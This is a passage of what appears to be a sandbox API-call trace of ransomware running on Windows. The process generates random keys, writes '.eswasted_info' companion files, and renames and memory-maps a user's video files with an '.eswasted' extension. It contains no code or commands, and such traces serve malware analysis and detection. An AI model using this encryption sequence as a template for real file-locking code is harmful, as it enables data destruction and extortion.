(hProv=0x70f058, dwFlags=0x0) returned 1 [0081.259] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.260] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.260] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.301] SetEndOfFile (hFile=0x130) returned 1 [0081.306] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.306] CloseHandle (hObject=0x130) returned 1 [0081.308] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.308] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.309] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.309] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.309] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jL qIjg.mp4") returned 52 [0081.309] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x272) returned 0x71ec18 [0081.309] lstrcpyW (in: lpString1=0x71ec80, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.309] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.309] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.310] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.310] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jL qIjg.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jl qijg.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.311] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.313] SetEndOfFile (hFile=0x130) returned 1 [0081.313] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.313] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.313] lstrcpyW (in: lpString1=0x71ec80, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.313] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jL qIjg.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jl qijg.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jL qIjg.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jl qijg.mp4.eswasted")) returned 1 [0081.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jL qIjg.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jl qijg.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0081.314] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0081.315] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.316] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.316] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.316] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.317] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.317] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.327] SetEndOfFile (hFile=0x130) returned 1 [0081.330] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.330] CloseHandle (hObject=0x130) returned 1 [0081.332] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.332] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.333] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.333] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.333] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\K0 aq3htTS.mp4") returned 55 [0081.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x278) returned 0x71ec18 [0081.334] lstrcpyW (in: lpString1=0x71ec86, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.334] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.334] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.335] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.335] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\K0 aq3htTS.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\k0 aq3htts.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.335] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.337] SetEndOfFile (hFile=0x130) returned 1 [0081.337] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.337] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.337] lstrcpyW (in: lpString1=0x71ec86, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\K0 aq3htTS.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\k0 aq3htts.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\K0 aq3htTS.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\k0 aq3htts.mp4.eswasted")) returned 1 [0081.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\K0 aq3htTS.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\k0 aq3htts.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.338] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0081.338] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.339] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.339] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.340] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.340] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.341] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.381] SetEndOfFile (hFile=0x130) returned 1 [0081.383] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0081.383] CloseHandle (hObject=0x130) returned 1 [0081.385] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.385] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.386] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.386] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.386] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\i9yIY.flv") returned 57 [0081.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27c) returned 0x71ec18 [0081.386] lstrcpyW (in: lpString1=0x71ec8a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0081.386] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.386] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0081.386] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\i9yIY.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\onnt0x\\i9yiy.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.598] WriteFile (in: hFile=0x130, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.599] SetEndOfFile (hFile=0x130) returned 1 [0081.599] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.599] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0081.600] lstrcpyW (in: lpString1=0x71ec8a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\i9yIY.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\onnt0x\\i9yiy.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\i9yIY.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\onnt0x\\i9yiy.flv.eswasted")) returned 1 [0081.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\i9yIY.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\onnt0x\\i9yiy.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0081.600] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0081.603] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.604] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.604] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.604] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.605] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.605] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.614] SetEndOfFile (hFile=0x130) returned 1 [0081.616] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0081.616] CloseHandle (hObject=0x130) returned 1 [0081.618] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.618] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.619] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.619] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.619] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\z_5qmvTbKPxIZnRRWRz5.avi") returned 72 [0081.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x29a) returned 0x71ec18 [0081.619] lstrcpyW (in: lpString1=0x71eca8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0081.619] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.620] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0081.620] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\z_5qmvTbKPxIZnRRWRz5.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\onnt0x\\z_5qmvtbkpxiznrrwrz5.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.620] WriteFile (in: hFile=0x130, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.621] SetEndOfFile (hFile=0x130) returned 1 [0081.621] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.621] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0081.621] lstrcpyW (in: lpString1=0x71eca8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.621] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\z_5qmvTbKPxIZnRRWRz5.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\onnt0x\\z_5qmvtbkpxiznrrwrz5.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\z_5qmvTbKPxIZnRRWRz5.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\onnt0x\\z_5qmvtbkpxiznrrwrz5.avi.eswasted")) returned 1 [0081.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\z_5qmvTbKPxIZnRRWRz5.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\onnt0x\\z_5qmvtbkpxiznrrwrz5.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0081.622] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0081.624] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.625] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.625] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.625] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.626] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.626] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.635] SetEndOfFile (hFile=0x130) returned 1 [0081.637] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0081.637] CloseHandle (hObject=0x130) returned 1 [0081.670] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.670] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.671] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.671] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.671] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qb-fZ99k7wy1HKTqSU.mkv") returned 63 [0081.671] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x288) returned 0x71ec18 [0081.671] lstrcpyW (in: lpString1=0x71ec96, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.671] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.671] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.672] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.672] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qb-fZ99k7wy1HKTqSU.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qb-fz99k7wy1hktqsu.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.672] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.673] SetEndOfFile (hFile=0x130) returned 1 [0081.673] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.673] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.673] lstrcpyW (in: lpString1=0x71ec96, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qb-fZ99k7wy1HKTqSU.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qb-fz99k7wy1hktqsu.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qb-fZ99k7wy1HKTqSU.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qb-fz99k7wy1hktqsu.mkv.eswasted")) returned 1 [0081.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qb-fZ99k7wy1HKTqSU.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qb-fz99k7wy1hktqsu.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0081.674] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0081.676] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.676] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0081.677] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.677] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.677] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.677] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.687] SetEndOfFile (hFile=0x130) returned 1 [0081.689] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.689] CloseHandle (hObject=0x130) returned 1 [0081.691] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.691] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.691] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.691] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.692] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QudPter9d41K5uk.flv") returned 60 [0081.692] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x282) returned 0x71ec18 [0081.692] lstrcpyW (in: lpString1=0x71ec90, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.692] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.692] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.692] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.692] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QudPter9d41K5uk.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qudpter9d41k5uk.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.693] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.694] SetEndOfFile (hFile=0x130) returned 1 [0081.694] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.694] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.694] lstrcpyW (in: lpString1=0x71ec90, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.694] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QudPter9d41K5uk.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qudpter9d41k5uk.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QudPter9d41K5uk.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qudpter9d41k5uk.flv.eswasted")) returned 1 [0081.695] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QudPter9d41K5uk.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qudpter9d41k5uk.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.695] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, 